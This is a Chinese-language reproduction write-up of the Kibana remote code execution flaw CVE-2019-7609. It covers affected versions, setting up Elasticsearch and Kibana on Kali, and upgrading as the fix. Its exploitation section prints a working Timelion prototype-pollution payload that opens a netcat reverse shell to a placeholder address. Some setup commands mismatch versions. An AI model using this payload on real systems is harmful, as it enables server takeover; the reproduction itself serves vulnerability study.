怎么进行Kibana远程代码执行CVE-2019-7609漏洞复现的分析

发布时间:2021-12-10 15:40:21 作者:柒染
来源:亿速云 阅读:191

怎么进行Kibana远程代码执行CVE-2019-7609漏洞复现的分析,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

0x00 简介


Kibana 是为 Elasticsearch设计的开源分析和可视化平台。你可以使用 Kibana 来搜索,查看存储在 Elasticsearch 索引中的数据并与之交互。你可以很容易实现高级的数据分析和可视化,以图标的形式展现出来。

0x01 漏洞概述


攻击者利用漏洞可以通过Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。

0x02 影响版本


Kibana < 6.6.1

Kibana < 5.6.15

0x03 环境搭建


本来是打算docker搭建的,奈何网络故障,索性直接kali搭建了

受影响的版本为Kibana < 6.6.0,这里选择了6.5.3进行搭建,修改虚拟机内存4G以上

1、Elasticsearch安装

a) 首先去官网下载6.5.3的tar包并解压

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gztar -zxvf elasticsearch-6.5.3.tar.gz

b) 直接运行即可

cd elasticsearch-6.5.3./bin/elasticsearch

**此处有坑**:

i. es要用非root用户启动,否则会报` can not run elasticsearch as root`错误。

解决方法:使用非root用户启动即可。

ii. 如果前边是用root用户下载和解压的es,直接用普通用户启动时会报` AccessDeniedException`错误

解决方法:改文件属主

elk@kali:~$ sudo chown -R ubuntu ~/elasticsearch-6.5.3/

elk@kali:~$ sudo chgrp -R ubuntu ~/elasticsearch-6.5.3/

iii. es需要java支持,由于我是在kali上搭的,所以就没写java安装的过程(kali自带了openJDK)至于说java怎么装~emmm,是个好问题,百度去~


本文仅提供JDK网盘下载(公众号回复JDK

访问http://127.0.0.1:9200/,长这个样子就说明es启动成功了

怎么进行Kibana远程代码执行CVE-2019-7609漏洞复现的分析

2、Kibana安装

a) 官网下载压缩包并解压

wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gztar –zxvf kibana-5.4.3-linux-x86_64.tar.gz

b) 直接运行

cd kibana-5.4.3-linux-x86_64./bin/kibana

搭建成功,激动人心!

看一看版本号,嗯,是存在漏洞的样子~

怎么进行Kibana远程代码执行CVE-2019-7609漏洞复现的分析

0x04 漏洞利用


漏洞点在Timelion处(名字和Timeline有点像)

直接填入Poc,过程和结果如图:

怎么进行Kibana远程代码执行CVE-2019-7609漏洞复现的分析

怎么进行Kibana远程代码执行CVE-2019-7609漏洞复现的分析

有种“做饭半小时,吃饭十分钟”的赶脚······【手动捂脸】

有人可能会说我的payload跟作者那个不一样呢,我这个就是换了个反弹shell的方法,作者那个不晓得为啥我kali上一弹就崩2333

Poc:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("nc -e /bin/sh xx.xx.xx.xx 4321");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

0x05 修复方式


升级Kibana至新版本

看完上述内容,你们掌握怎么进行Kibana远程代码执行CVE-2019-7609漏洞复现的分析的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

推荐阅读:
  1. Windows远程代码执行漏洞及Microsoft Excel远程代码执行漏洞的示例分析
  2. 如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

cve-2019-7609 kibana

上一篇:Apache Solr Velocity模板注入RCE漏洞复现是怎样的

下一篇:选择html5建站的优势有哪些

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》